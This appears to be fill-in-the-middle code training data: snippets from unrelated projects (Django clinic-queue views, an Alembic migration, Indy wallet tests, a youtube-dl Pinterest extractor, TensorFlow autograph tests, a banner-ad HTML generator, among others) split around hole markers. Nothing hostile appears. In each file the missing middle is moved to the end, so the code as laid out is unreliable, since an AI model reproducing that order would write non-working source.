config.position.y = e.pageY - $canvas.offset().top;
});
};
this.init = function () {
this.setCanvas();
this.setContext();
this.setInitialPosition();
this.loop(this.createStars);
this.bind();
};
}
$.fn.constellation = function (options) {
return this.each(function () {
var c = new Constellation(this, options);
c.init();
});
};
})($, window);
var startAnimation = function() {
window.addEventListener("resize", function() { startAnimation()} );
$('canvas').constellation({
line: {
color: 'rgba(255, 255, 255, .5)'
}
});
};<|fim▁end|>
|
(function ($, window) {
function Constellation (canvas, options) {
|
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from django.shortcuts import render
from enfermeriaapp.models import Cola_Consulta, Cola_Enfermeria
from django.core.urlresolvers import reverse
from django.shortcuts import redirect
from django.utils import timezone
import time
from django.contrib import messages
from django.contrib.auth.decorators import login_required
import datetime
from django.db import connection
import json
from datospersonalesapp.models import Paciente
from nuevoingresoapp.models import Expediente_Provisional
from enfermeriaapp.forms import ColaEnfermeriaForm
# View to add a new patient to the queue for taking vital signs
@login_required(login_url='logins')
def cola_enfermeria_nuevo(request,pk):
info = ""
pacientes=Paciente.objects.filter(estadoExpediente='A').order_by('facultadE')
cursor = connection.cursor()
cursor.execute('SELECT distinct(p.facultadE_id), f.nombreFacultad FROM datospersonalesapp_paciente as p, datospersonalesapp_facultad as f WHERE p.facultadE_id = f.codigoFacultad ORDER BY f.nombreFacultad')
auxL = cursor.fetchall()
if request.method == "GET":
data = {'idPaciente':Paciente.objects.filter(codigoPaciente = pk)
}
form = ColaEnfermeriaForm(data)
existe = Cola_Enfermeria.objects.filter(idPaciente = pk)
if existe:
info="El paciente ya existe en la cola"
else:
if form.is_valid():
expediente = form.save(commit=False)
                expediente.hora = time.strftime("%H:%M:%S") # 24-hour format
expediente.save()
info = "Datos Guardados Exitosamen"
return render(request,"datospersonales/paciente_list.html",{'personalpaciente':pacientes,'datoFacult':auxL,'informacion':info})
else:
form=ColaEnfermeriaForm()
info = "Ocurrio un error los datos no se guardaron"<|fim▁hole|>def cola_enfermeria_list(request):
cola=Cola_Enfermeria.objects.order_by('hora')
return render(request,"enfermeriaapp/cola_enfermeria_list.html",{'cola':cola})
# View to manually remove a patient from the vital signs queue
@login_required(login_url='logins')
def cola_enfermeria_borrar(request,pk):
cola=Cola_Enfermeria.objects.order_by('hora')
info = ""
if request.method == "GET":
data = {'idPaciente':Paciente.objects.filter(codigoPaciente = pk)
}
form = ColaEnfermeriaForm(data)
existe = Cola_Enfermeria.objects.filter(idPaciente = pk)
if existe:
if form.is_valid():
existe.delete()
info = "Datos eliminados exitosamente"
return render(request,"enfermeriaapp/cola_enfermeria_list.html",{'cola':cola})
else:
form=ColaEnfermeriaForm()
info = "Ocurrio un error no se pudo eliminar el paciente de la cola"
else:
info="El paciente no existe en la cola"
return render(request,"enfermeriaapp/cola_enfermeria_list.html",{'cola':cola})
# Shows the list of patients queued for a consultation
@login_required(login_url='logins')
def cola_consulta_list(request):
cursor = connection.cursor()
cursor.execute('SELECT distinct(p.nit) as codigo, p.nombrePrimero as nombre,p.nombreSegundo as nombreSegundo, p.apellidoPrimero as apellido,c.hora,c.idDoctor_id as doctor FROM datospersonalesapp_paciente as p, enfermeriaapp_cola_consulta as c WHERE p.nit = c.nit')
cursor2 = connection.cursor()
cursor2.execute('SELECT distinct(p.nit) as codigo, p.nombrePrimero as nombre,p.nombreSegundo as nombreSegundo, p.apellidoPrimero as apellido,c.hora,c.idDoctor_id as doctor FROM nuevoingresoapp_expediente_provisional as p, enfermeriaapp_cola_consulta as c WHERE p.nit = c.nit')
cola = cursor.fetchall()
cola += cursor2.fetchall()
#cola=Cola_Consulta.objects.order_by('hora')
return render(request,"enfermeriaapp/cola_consulta_list.html",{'cola':cola})<|fim▁end|>
|
return render(request,"datospersonales/paciente_list.html",{'personalpaciente':pacientes,'datoFacult':auxL,'informacion':info})
# Shows the list of patients queued for vital signs
@login_required(login_url='logins')
|
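The raw-SQL DISTINCT queries in these views can usually be expressed through the ORM, which also spares the manual cursor handling. A hedged sketch against the same models (it assumes facultadE is a ForeignKey to a Facultad model with a nombreFacultad field, as the SQL suggests):

from datospersonalesapp.models import Paciente

faculties = (Paciente.objects
             .filter(estadoExpediente='A')
             .values_list('facultadE_id', 'facultadE__nombreFacultad')
             .distinct()
             .order_by('facultadE__nombreFacultad'))
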
<|file_name|>19180cf98af6_nsx_gw_devices.py<|end_file_name|><|fim▁begin|># Copyright 2014 OpenStack Foundation<|fim▁hole|>#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""nsx_gw_devices
Revision ID: 19180cf98af6
Revises: 117643811bca
Create Date: 2014-02-26 02:46:26.151741
"""
# revision identifiers, used by Alembic.
revision = '19180cf98af6'
down_revision = '117643811bca'
# Change to ['*'] if this migration applies to all plugins
migration_for_plugins = [
'neutron.plugins.nicira.NeutronPlugin.NvpPluginV2',
'neutron.plugins.nicira.NeutronServicePlugin.NvpAdvancedPlugin',
'neutron.plugins.vmware.plugin.NsxPlugin',
'neutron.plugins.vmware.plugin.NsxServicePlugin'
]
from alembic import op
import sqlalchemy as sa
from neutron.db import migration
def upgrade(active_plugins=None, options=None):
if not migration.should_run(active_plugins, migration_for_plugins):
return
op.create_table(
'networkgatewaydevicereferences',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('network_gateway_id', sa.String(length=36), nullable=True),
sa.Column('interface_name', sa.String(length=64), nullable=True),
sa.ForeignKeyConstraint(['network_gateway_id'], ['networkgateways.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id', 'network_gateway_id', 'interface_name'),
mysql_engine='InnoDB')
# Copy data from networkgatewaydevices into networkgatewaydevicereference
op.execute("INSERT INTO networkgatewaydevicereferences SELECT "
"id, network_gateway_id, interface_name FROM "
"networkgatewaydevices")
# drop networkgatewaydevices
op.drop_table('networkgatewaydevices')
op.create_table(
'networkgatewaydevices',
sa.Column('tenant_id', sa.String(length=255), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('nsx_id', sa.String(length=36), nullable=True),
sa.Column('name', sa.String(length=255), nullable=True),
sa.Column('connector_type', sa.String(length=10), nullable=True),
sa.Column('connector_ip', sa.String(length=64), nullable=True),
sa.Column('status', sa.String(length=16), nullable=True),
sa.PrimaryKeyConstraint('id'),
mysql_engine='InnoDB')
# Create a networkgatewaydevice for each existing reference.
# For existing references nsx_id == neutron_id
# Do not fill conenctor info as they would be unknown
op.execute("INSERT INTO networkgatewaydevices (id, nsx_id) SELECT "
"id, id as nsx_id FROM networkgatewaydevicereferences")
def downgrade(active_plugins=None, options=None):
if not migration.should_run(active_plugins, migration_for_plugins):
return
op.drop_table('networkgatewaydevices')
# Re-create previous version of networkgatewaydevices table
op.create_table(
'networkgatewaydevices',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('network_gateway_id', sa.String(length=36), nullable=True),
sa.Column('interface_name', sa.String(length=64), nullable=True),
sa.ForeignKeyConstraint(['network_gateway_id'], ['networkgateways.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
mysql_engine='InnoDB')
# Copy from networkgatewaydevicereferences to networkgatewaydevices
op.execute("INSERT INTO networkgatewaydevices SELECT "
"id, network_gateway_id, interface_name FROM "
"networkgatewaydevicereferences")
# Dropt networkgatewaydevicereferences
op.drop_table('networkgatewaydevicereferences')<|fim▁end|>
| |
<|file_name|>test_import_wallet.py<|end_file_name|><|fim▁begin|>import pytest
from indy import IndyError
from indy import did
from indy import wallet
from indy.error import ErrorCode
@pytest.mark.asyncio
@pytest.mark.parametrize("wallet_handle_cleanup", [False])
async def test_import_wallet_works(wallet_handle, wallet_config, credentials, export_config):
(_did, _verkey) = await did.create_and_store_my_did(wallet_handle, "{}")
await did.set_did_metadata(wallet_handle, _did, "metadata")
did_with_meta_before = await did.get_my_did_with_meta(wallet_handle, _did)
await wallet.export_wallet(wallet_handle, export_config)
await wallet.close_wallet(wallet_handle)
await wallet.delete_wallet(wallet_config, credentials)
await wallet.import_wallet(wallet_config, credentials, export_config)
wallet_handle = await wallet.open_wallet(wallet_config, credentials)
<|fim▁hole|>
@pytest.mark.asyncio
async def test_import_wallet_works_for_not_exist_path(wallet_config, credentials, export_config):
with pytest.raises(IndyError) as e:
await wallet.import_wallet(wallet_config, credentials, export_config)
assert ErrorCode.CommonIOError == e.value.error_code<|fim▁end|>
|
did_with_meta_after = await did.get_my_did_with_meta(wallet_handle, _did)
assert did_with_meta_before == did_with_meta_after
await wallet.close_wallet(wallet_handle)
|
<|file_name|>view.js<|end_file_name|><|fim▁begin|>(function(){
var getDataBtn = document.getElementById('btn-getdata');
var content = document.getElementById('content');
getDataBtn.addEventListener('click',getCourseData);<|fim▁hole|>
function getCourseData(){
datacontext().getCourseSessions(function(courseSessions){
renderView(courseSessions);
});
}
function renderView(sessions){
content.innerHTML = JSON.stringify(sessions);
}
})();<|fim▁end|>
| |
<|file_name|>language.py<|end_file_name|><|fim▁begin|>from django.conf import settings
from django.template import loader
from django.views.i18n import set_language
from xadmin.plugins.utils import get_context_dict
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, CommAdminView, BaseAdminView
<|fim▁hole|>class SetLangNavPlugin(BaseAdminPlugin):
def block_top_navmenu(self, context, nodes):
context = get_context_dict(context)
context['redirect_to'] = self.request.get_full_path()
nodes.append(loader.render_to_string('xadmin/blocks/comm.top.setlang.html', context=context))
class SetLangView(BaseAdminView):
def post(self, request, *args, **kwargs):
if 'nav_menu' in request.session:
del request.session['nav_menu']
return set_language(request)
if settings.LANGUAGES and 'django.middleware.locale.LocaleMiddleware' in settings.MIDDLEWARE_CLASSES:
site.register_plugin(SetLangNavPlugin, CommAdminView)
site.register_view(r'^i18n/setlang/$', SetLangView, 'set_language')<|fim▁end|>
| |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># This file is part of Indico.
# Copyright (C) 2002 - 2016 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from flask import session
from werkzeug.exceptions import Forbidden
from indico.modules.rb.controllers import RHRoomBookingBase
from indico.modules.rb.util import rb_is_admin
from indico.util.i18n import _
class RHRoomBookingAdminBase(RHRoomBookingBase):
"""
Adds admin authorization. All classes that implement admin
tasks should be derived from this class.
"""<|fim▁hole|> def _checkProtection(self):
if session.user is None:
self._checkSessionUser()
elif not rb_is_admin(session.user):
raise Forbidden(_('You are not authorized to take this action.'))<|fim▁end|>
| |
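A sketch of the subclassing pattern the docstring above describes; the class name and _process body here are hypothetical, not part of Indico:

class RHRoomBookingExampleAdmin(RHRoomBookingAdminBase):
    """Hypothetical admin-only view: _checkProtection on the base class
    runs first, so _process executes only for room-booking admins."""

    def _process(self):
        return 'admin-only room booking settings'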
<|file_name|>pinterest.py<|end_file_name|><|fim▁begin|># coding: utf-8
from __future__ import unicode_literals
import json
import re
from .common import InfoExtractor
from ..compat import compat_str
from ..utils import (
determine_ext,
float_or_none,
int_or_none,
try_get,
unified_timestamp,
url_or_none,
)
class PinterestBaseIE(InfoExtractor):
_VALID_URL_BASE = r'https?://(?:[^/]+\.)?pinterest\.(?:com|fr|de|ch|jp|cl|ca|it|co\.uk|nz|ru|com\.au|at|pt|co\.kr|es|com\.mx|dk|ph|th|com\.uy|co|nl|info|kr|ie|vn|com\.vn|ec|mx|in|pe|co\.at|hu|co\.in|co\.nz|id|com\.ec|com\.py|tw|be|uk|com\.bo|com\.pe)'
def _call_api(self, resource, video_id, options):
return self._download_json(
'https://www.pinterest.com/resource/%sResource/get/' % resource,
video_id, 'Download %s JSON metadata' % resource, query={
'data': json.dumps({'options': options})
})['resource_response']
def _extract_video(self, data, extract_formats=True):
video_id = data['id']
title = (data.get('title') or data.get('grid_title') or video_id).strip()
urls = []
formats = []
duration = None
if extract_formats:
for format_id, format_dict in data['videos']['video_list'].items():
if not isinstance(format_dict, dict):<|fim▁hole|> continue
urls.append(format_url)
duration = float_or_none(format_dict.get('duration'), scale=1000)
ext = determine_ext(format_url)
if 'hls' in format_id.lower() or ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
format_url, video_id, 'mp4', entry_protocol='m3u8_native',
m3u8_id=format_id, fatal=False))
else:
formats.append({
'url': format_url,
'format_id': format_id,
'width': int_or_none(format_dict.get('width')),
'height': int_or_none(format_dict.get('height')),
'duration': duration,
})
self._sort_formats(
formats, field_preference=('height', 'width', 'tbr', 'format_id'))
description = data.get('description') or data.get('description_html') or data.get('seo_description')
timestamp = unified_timestamp(data.get('created_at'))
def _u(field):
return try_get(data, lambda x: x['closeup_attribution'][field], compat_str)
uploader = _u('full_name')
uploader_id = _u('id')
repost_count = int_or_none(data.get('repin_count'))
comment_count = int_or_none(data.get('comment_count'))
categories = try_get(data, lambda x: x['pin_join']['visual_annotation'], list)
tags = data.get('hashtags')
thumbnails = []
images = data.get('images')
if isinstance(images, dict):
for thumbnail_id, thumbnail in images.items():
if not isinstance(thumbnail, dict):
continue
thumbnail_url = url_or_none(thumbnail.get('url'))
if not thumbnail_url:
continue
thumbnails.append({
'url': thumbnail_url,
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
})
return {
'id': video_id,
'title': title,
'description': description,
'duration': duration,
'timestamp': timestamp,
'thumbnails': thumbnails,
'uploader': uploader,
'uploader_id': uploader_id,
'repost_count': repost_count,
'comment_count': comment_count,
'categories': categories,
'tags': tags,
'formats': formats,
'extractor_key': PinterestIE.ie_key(),
}
class PinterestIE(PinterestBaseIE):
_VALID_URL = r'%s/pin/(?P<id>\d+)' % PinterestBaseIE._VALID_URL_BASE
_TESTS = [{
'url': 'https://www.pinterest.com/pin/664281013778109217/',
'md5': '6550c2af85d6d9f3fe3b88954d1577fc',
'info_dict': {
'id': '664281013778109217',
'ext': 'mp4',
'title': 'Origami',
'description': 'md5:b9d90ddf7848e897882de9e73344f7dd',
'duration': 57.7,
'timestamp': 1593073622,
'upload_date': '20200625',
'uploader': 'Love origami -I am Dafei',
'uploader_id': '586523688879454212',
'repost_count': 50,
'comment_count': 0,
'categories': list,
'tags': list,
},
}, {
'url': 'https://co.pinterest.com/pin/824721750502199491/',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
data = self._call_api(
'Pin', video_id, {
'field_set_key': 'unauth_react_main_pin',
'id': video_id,
})['data']
return self._extract_video(data)
class PinterestCollectionIE(PinterestBaseIE):
_VALID_URL = r'%s/(?P<username>[^/]+)/(?P<id>[^/?#&]+)' % PinterestBaseIE._VALID_URL_BASE
_TESTS = [{
'url': 'https://www.pinterest.ca/mashal0407/cool-diys/',
'info_dict': {
'id': '585890301462791043',
'title': 'cool diys',
},
'playlist_count': 8,
}, {
'url': 'https://www.pinterest.ca/fudohub/videos/',
'info_dict': {
'id': '682858430939307450',
'title': 'VIDEOS',
},
'playlist_mincount': 365,
'skip': 'Test with extract_formats=False',
}]
@classmethod
def suitable(cls, url):
return False if PinterestIE.suitable(url) else super(
PinterestCollectionIE, cls).suitable(url)
def _real_extract(self, url):
username, slug = re.match(self._VALID_URL, url).groups()
board = self._call_api(
'Board', slug, {
'slug': slug,
'username': username
})['data']
board_id = board['id']
options = {
'board_id': board_id,
'page_size': 250,
}
bookmark = None
entries = []
while True:
if bookmark:
options['bookmarks'] = [bookmark]
board_feed = self._call_api('BoardFeed', board_id, options)
for item in (board_feed.get('data') or []):
if not isinstance(item, dict) or item.get('type') != 'pin':
continue
video_id = item.get('id')
if video_id:
# Some pins may not be available anonymously via pin URL
# video = self._extract_video(item, extract_formats=False)
# video.update({
# '_type': 'url_transparent',
# 'url': 'https://www.pinterest.com/pin/%s/' % video_id,
# })
# entries.append(video)
entries.append(self._extract_video(item))
bookmark = board_feed.get('bookmark')
if not bookmark:
break
return self.playlist_result(
entries, playlist_id=board_id, playlist_title=board.get('name'))<|fim▁end|>
|
continue
format_url = url_or_none(format_dict.get('url'))
if not format_url or format_url in urls:
|
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|>// Copyright 2012-2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
/*!
The Rust parser and macro expander.
# Note
This API is completely unstable and subject to change.
*/
#![crate_id = "syntax#0.11.0"]
#![experimental]
#![license = "MIT/ASL2"]
#![crate_type = "dylib"]
#![crate_type = "rlib"]
#![doc(html_logo_url = "http://www.rust-lang.org/logos/rust-logo-128x128-blk-v2.png",
html_favicon_url = "http://www.rust-lang.org/favicon.ico",
html_root_url = "http://doc.rust-lang.org/0.11.0/")]
#![feature(macro_rules, globs, managed_boxes, default_type_params, phase)]
#![feature(quote, unsafe_destructor)]
#![allow(deprecated)]
extern crate serialize;
extern crate term;
#[phase(plugin, link)] extern crate log;
extern crate fmt_macros;
extern crate debug;
pub mod util {
pub mod interner;
#[cfg(test)]
pub mod parser_testing;
pub mod small_vector;
}
pub mod syntax {
pub use ext;
pub use parse;
pub use ast;
}
pub mod owned_slice;
pub mod attr;
pub mod diagnostic;
pub mod codemap;
pub mod abi;
pub mod ast;
pub mod ast_util;
pub mod ast_map;
pub mod visit;
pub mod fold;
pub mod parse;
pub mod crateid;
pub mod print {
pub mod pp;
pub mod pprust;
}<|fim▁hole|>pub mod ext {
pub mod asm;
pub mod base;
pub mod expand;
pub mod quote;
pub mod deriving;
pub mod build;
pub mod tt {
pub mod transcribe;
pub mod macro_parser;
pub mod macro_rules;
}
pub mod mtwt;
pub mod cfg;
pub mod fmt;
pub mod format;
pub mod env;
pub mod bytes;
pub mod concat;
pub mod concat_idents;
pub mod log_syntax;
pub mod source_util;
pub mod trace_macros;
}<|fim▁end|>
| |
<|file_name|>routes.py<|end_file_name|><|fim▁begin|>import flask
from donut import auth_utils
from donut.modules.account import blueprint, helpers
@blueprint.route("/request")
def request_account():
"""Provides a form to request an account."""
return flask.render_template("request_account.html")
@blueprint.route("/request/submit", methods=["POST"])<|fim▁hole|> last_name = flask.request.form.get("last_name", None)
if uid is None or last_name is None:
flask.flash("Invalid request.")
return flask.redirect(flask.url_for("account.request_account"))
success, error_msg = helpers.handle_request_account(uid, last_name)
if success:
flask.flash(
"An email has been sent with a link to create your account.")
return flask.redirect(flask.url_for("home"))
else:
flask.flash(error_msg)
return flask.redirect(flask.url_for("account.request_account"))
@blueprint.route("/create/<create_account_key>")
def create_account(create_account_key):
"""Checks the key. If valid, displays the create account page."""
user_id = auth_utils.check_create_account_key(create_account_key)
if user_id is None:
flask.current_app.logger.warn(
f'Invalid create_account_key: {create_account_key}')
flask.flash("Invalid request. Please check your link and try again.")
return flask.redirect(flask.url_for("home"))
user_data = helpers.get_user_data(user_id)
if user_data is None:
flask.flash("An unexpected error occurred. Please contact DevTeam.")
return flask.redirect(flask.url_for("home"))
return flask.render_template(
"create_account.html", user_data=user_data, key=create_account_key)
@blueprint.route("/create/<create_account_key>/submit", methods=["POST"])
def create_account_submit(create_account_key):
"""Handles a create account request."""
user_id = auth_utils.check_create_account_key(create_account_key)
if user_id is None:
# Key is invalid.
flask.current_app.logger.warn(
f'Invalid create_account_key: {create_account_key}')
flask.flash("Someone's been naughty.")
return flask.redirect(flask.url_for("home"))
username = flask.request.form.get("username", None)
password = flask.request.form.get("password", None)
password2 = flask.request.form.get("password2", None)
if username is None \
or password is None \
or password2 is None:
flask.current_app.logger.warn(
f'Invalid create account form for user ID {user_id}')
flask.flash("Invalid request.")
return flask.redirect(flask.url_for("home"))
if helpers.handle_create_account(user_id, username, password, password2):
flask.session['username'] = username
flask.current_app.logger.info(
f'Created account with username {username} for user ID {user_id}')
flask.flash("Account successfully created.")
return flask.redirect(flask.url_for("home"))
else:
# Flashes already handled.
return flask.redirect(
flask.url_for(
"account.create_account",
create_account_key=create_account_key))<|fim▁end|>
|
def request_account_submit():
"""Handles an account creation request."""
uid = flask.request.form.get("uid", None)
|
<|file_name|>conversion_test.py<|end_file_name|><|fim▁begin|># Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for conversion module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.python.autograph import utils
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.impl import api
from tensorflow.python.autograph.impl import conversion
from tensorflow.python.autograph.pyct import compiler
from tensorflow.python.framework import constant_op
from tensorflow.python.keras.engine import training
from tensorflow.python.platform import test
class ConversionTest(test.TestCase):
def _simple_program_ctx(self):
return converter.ProgramContext(
options=converter.ConversionOptions(recursive=True),
autograph_module=api)
def test_is_whitelisted_for_graph(self):
def test_fn():
return constant_op.constant(1)
self.assertFalse(conversion.is_whitelisted_for_graph(test_fn))
self.assertTrue(conversion.is_whitelisted_for_graph(utils))
self.assertTrue(conversion.is_whitelisted_for_graph(constant_op.constant))
def test_convert_entity_to_ast_unsupported_types(self):
with self.assertRaises(NotImplementedError):
program_ctx = self._simple_program_ctx()
conversion.convert_entity_to_ast('dummy', program_ctx)
def test_convert_entity_to_ast_callable(self):
b = 2
def f(a):
return a + b
program_ctx = self._simple_program_ctx()
nodes, name, info = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertIs(info.namespace['b'], b)
def test_convert_entity_to_ast_function_with_defaults(self):
b = 2
c = 1
def f(a, d=c + 1):
return a + b + d
program_ctx = self._simple_program_ctx()
nodes, name, _ = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertEqual(
compiler.ast_to_source(fn_node.args.defaults[0]).strip(), 'None')
def test_convert_entity_to_ast_call_tree(self):
def g(a):
return a
def f(a):
return g(a)
program_ctx = self._simple_program_ctx()
nodes, _, _ = conversion.convert_entity_to_ast(f, program_ctx)
f_node, = nodes
self.assertEqual('tf__f', f_node.name)
def test_convert_entity_to_ast_class_hierarchy(self):
class TestBase(object):
def __init__(self, x='base'):
self.x = x
def foo(self):
return self.x
<|fim▁hole|>
def __init__(self, y):
super(TestSubclass, self).__init__('sub')
self.y = y
def foo(self):
return self.y
def baz(self):
return self.y
program_ctx = self._simple_program_ctx()
with self.assertRaisesRegex(NotImplementedError, 'classes.*whitelisted'):
conversion.convert_entity_to_ast(TestSubclass, program_ctx)
def test_convert_entity_to_ast_class_hierarchy_whitelisted(self):
class TestSubclass(training.Model):
def __init__(self, y):
super(TestSubclass, self).__init__()
self.built = False
def call(self, x):
return 3 * x
program_ctx = self._simple_program_ctx()
(import_node, class_node), name, _ = conversion.convert_entity_to_ast(
TestSubclass, program_ctx)
self.assertEqual(import_node.names[0].name, 'Model')
self.assertEqual(name, 'TfTestSubclass')
self.assertEqual(class_node.name, 'TfTestSubclass')
def test_convert_entity_to_ast_lambda(self):
b = 2
f = lambda x: b * x if x > 0 else -x
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['b'], b)
def test_convert_entity_to_ast_multiple_lambdas(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda y: b * y)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['a'], a)
def test_convert_entity_to_ast_multiple_lambdas_ambiguous_definitions(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda x: b * x)
program_ctx = self._simple_program_ctx()
with self.assertRaises(ValueError):
conversion.convert_entity_to_ast(f, program_ctx)
def test_convert_entity_to_ast_lambda_code_with_garbage(self):
# pylint:disable=g-long-lambda
f = ( # intentional wrap
lambda x: (
x # intentional wrap
+ 1),)[0]
# pylint:enable=g-long-lambda
program_ctx = self._simple_program_ctx()
(fn_node,), name, _ = conversion.convert_entity_to_ast(f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
def test_convert_entity_to_ast_nested_functions(self):
b = 2
def f(x):
def g(x):
return b * x
return g(x)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual(fn_node.name, 'tf__f')
self.assertEqual('tf__f', name)
self.assertIs(entity_info.namespace['b'], b)
if __name__ == '__main__':
test.main()<|fim▁end|>
|
def bar(self):
return self.x
class TestSubclass(TestBase):
|
<|file_name|>generate_html.py<|end_file_name|><|fim▁begin|># -- coding: utf-8 --
# Copyright 2015 Tim Santor
#
# This file is part of proprietary software and use of this file
# is strictly prohibited without written consent.
#
# @author Tim Santor <tsantor@xstudios.agency>
"""Generates HTML for HTML5 banner ads."""
# -----------------------------------------------------------------------------
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import logging
import os
import re
import shlex
import shutil
import time
from subprocess import PIPE, Popen
import pkg_resources
import six
import six.moves.configparser as configparser
from bashutils import logmsg
from .adkit import AdKitBase
# -----------------------------------------------------------------------------
class Main(AdKitBase):
"""Generates HTML for HTML5 banner ads."""
def __init__(self):
self.logger = logging.getLogger(__name__)
super(Main, self).__init__()
# def copy_files(self):
# """Copy files."""
# dest = os.path.join(self.input_dir, 'js')
# if not os.path.isdir(dest):
# if self.verbose:
# logmsg.info('Creating "js" directory...')
# shutil.copytree(self.get_data('js'), dest)
# else:
# if self.verbose:
# logmsg.warning('"js" directory already exists')
@staticmethod
def replace_all(text, dict):
"""Replace all."""
for src, target in six.iteritems(dict):
text = text.replace(src, target)
return text
def create_divs(self, dirpath):
jpg_files = self.get_files_matching(dirpath, '*.jpg')
png_files = self.get_files_matching(dirpath, '*.png')
all_files = jpg_files + png_files
output = ''
for f in all_files:
basename = os.path.basename(f)
name = os.path.splitext(basename)[0]
if basename in self.ignore_list:<|fim▁hole|> output += '<div id="{0}"></div>\n'.format(name)
# soup=BeautifulSoup(output, "html.parser")
# pretty_html=soup.prettify()
return output
def create_html(self, filename):
"""
Create a HTML file for an ad.
:param str size: width x height (eg - 300x250)
:param str name: output file name
:rtype bool:
"""
# get filename and extension
# basename = os.path.basename(filename)
# name = os.path.splitext(basename)[0]
dirpath = os.path.dirname(filename)
# get size
# size = self.get_size_from_filename(name)
size = self.get_size_from_dirname(filename)
# get width height based on size string (eg - 300x250)
width, height = size.split('x')
# create divs
divs = self.create_divs(dirpath)
# open the template and open a new file for writing
html = pkg_resources.resource_string(__name__, 'templates/' + self.type + '/index.html').decode("utf-8")
#print(html)
outfile = open(filename, 'w')
# replace the variables with the correct value
replacements = {
# '{{filename}}': name,
# '{{size}}': size,
'{{width}}': width,
'{{height}}': height,
'{{divs}}': divs,
}
html = Main.replace_all(html, replacements)
outfile.write(html)
outfile.close()
logmsg.success('"{0}" generated successfully'.format(filename))
def generate_html(self, dirs):
"""
Loop through all folders in the input directory and create an HTML page.
"""
num_files = 0
for d in dirs:
filepath = os.path.join(d, 'index.html')
if not os.path.exists(filepath):
self.create_html(filepath)
num_files+=1
else:
logmsg.warning('"{0}" already exists'.format(filepath))
logmsg.success('Generated {0} HTML files'.format(num_files))
def get_parser(self):
"""Return the parsed command line arguments."""
parser = argparse.ArgumentParser(
description='Generate HTML for banners..')
parser.add_argument('type', choices=['doubleclick', 'sizemek', 'adwords', 'dcm'], help='Ad type')
parser.add_argument('-l', '--log', help='Enable logging',
action='store_true')
return parser.parse_args()
def run(self):
"""Run script."""
config = self.get_config()
args = self.get_parser()
if args.log:
self.create_logger()
self.logger.debug('-' * 10)
self.type = args.type
self.input_dir = config.get('html5', 'input')
self.ignore_list = self.create_list(config.get('html5', 'exclude_list'))
# Check if the input dir exists
if not os.path.isdir(self.input_dir):
logmsg.error('"{0}" does not exist'.format(self.input_dir))
sys.exit()
# Do the stuff we came here to do
dirs = self.find_ad_dirs()
self.generate_html(dirs)
logmsg.success('HTML Generated')
# -----------------------------------------------------------------------------
def main():
"""Main script."""
script = Main()
script.run()
# -----------------------------------------------------------------------------
if __name__ == "__main__":
main()<|fim▁end|>
|
continue
|
